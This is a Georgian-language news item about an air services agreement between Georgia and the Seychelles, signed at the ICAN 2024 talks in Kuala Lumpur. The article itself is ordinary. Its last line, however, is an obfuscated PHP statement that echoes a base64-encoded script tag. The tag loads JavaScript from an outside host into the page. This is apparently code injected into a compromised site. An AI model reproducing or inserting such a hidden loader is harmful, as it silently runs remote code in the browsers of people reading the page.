celsiusi
ავერსი საქკაბელი

 საქართველოსა და სეიშელს შორის პირდაპირი ავიამიმოსვლის შეთანხმება გაფორმდა.

სამოქალაქო ავიაციის სააგენტოს მიერ გავრცელებული ინფორმაციის თანახმად, მალაიზიის ქალაქ კუალა-ლუმპურში, სამოქალაქო ავიაციის საერთაშორისო ორგანიზაციის (ICAO) ეგიდით მიმდინარე საერთაშორისო სამოქალაქო ავიაციის მოლაპარაკებების (ICAN 2024) ფარგლებში, საქართველოსა და სეიშელის რესპუბლიკის მთავრობებს შორის საჰაერო მიმოსვლის შესახებ შეთანხმებას მოეწერა ხელი.

საჰაერო მიმოსვლის შესახებ შეთანხმება ეფუძნება ლიბერალურ პრინციპებს და არ ითვალისწინებს შეზღუდვებს დანიშნული ავიაკომპანიების რაოდენობასა და დანიშნულების პუნქტებზე.

სააგენტო ელოდება, რომ შეთანხმება, ავიაკომპანიებისთვის მიმზიდველს გახდის საქართველოსა და სეიშელს შორის პირდაპირი რეგულარული ფრენების განხორციელებას და ხელს შეუწყობს როგორც ფრენების არეალის გაფართოებას, ისე ტურიზმისა და ქვეყნებს შორის სავაჭრო-ეკონომიკური ურთიერთობების გაღრმავებას.

ცნობისთვის, შეთანხმება ძალაში ორივე მხარის მიერ შიდასახელმწიფოებრივი პროცედურების დასრულების შემდეგ შევა. მასზე მუშაობა საქართველოსა და სეიშელის რესპუბლიკას შორის 2014 წელს დაიწყო, გასულ წელს კი საუდის არაბეთში გამართული სამოქალაქო ავიაციის საერთაშორისო მოლაპარაკებების (ICAN 2023) ფარგლებში, მხარეთა მიერ გაიმართა მოლაპარაკებები და ხელი მოეწერა ურთიერთგაგების მემორანდუმს. ამასთან, განხორციელდა ხსენებული შეთანხმების პარაფირება.

32
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");